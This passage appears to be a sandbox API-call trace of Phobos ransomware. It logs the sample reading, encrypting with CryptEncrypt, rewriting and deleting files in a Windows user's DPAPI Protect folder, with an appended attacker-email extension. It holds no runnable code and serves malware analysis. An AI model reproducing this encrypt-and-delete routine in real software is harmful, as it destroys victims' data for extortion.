HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.535] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.535] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.536] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.536] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.536] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0199.537] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.537] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.537] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.537] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.537] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.537] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.538] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.538] CloseHandle (hObject=0x130) returned 1 [0199.538] CloseHandle (hObject=0x15c) returned 1 [0199.538] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c")) returned 1 [0199.539] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.539] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.539] CloseHandle (hObject=0x15c) returned 1 [0199.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c")) returned 0x2026 [0199.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.539] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.539] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.540] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.540] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.540] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.541] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0199.541] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.542] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.542] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.542] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.542] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.542] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.542] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.542] CloseHandle (hObject=0x15c) returned 1 [0199.542] CloseHandle (hObject=0x130) returned 1 [0199.542] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0e15476d-d8fe-46ca-8099-ebdcf80f637c")) returned 1 [0199.543] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.544] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.544] CloseHandle (hObject=0x130) returned 1 [0199.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2")) returned 0x2026 [0199.544] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.544] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.544] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.545] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.545] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.545] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.546] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0199.546] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.547] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.547] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.547] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.547] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.547] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.547] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.547] CloseHandle (hObject=0x130) returned 1 [0199.547] CloseHandle (hObject=0x15c) returned 1 [0199.547] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\102a7bc8-3f85-4bb4-840a-38257d2965d2")) returned 1 [0199.548] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.548] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.549] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.549] CloseHandle (hObject=0x15c) returned 1 [0199.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d")) returned 0x2026 [0199.549] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.549] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.549] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.550] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.550] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.550] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.551] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0199.551] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.552] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.552] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.552] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.552] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.552] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.552] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.552] CloseHandle (hObject=0x15c) returned 1 [0199.552] CloseHandle (hObject=0x130) returned 1 [0199.552] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\2be989a0-16a1-424b-9211-51aa3bb43e5d")) returned 1 [0199.553] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.553] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.553] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.553] CloseHandle (hObject=0x130) returned 1 [0199.553] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d")) returned 0x2026 [0199.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.554] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.554] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.554] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fbbe72db-afd8-443b-88dd-64b20388700d.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.554] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.554] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.554] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.564] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 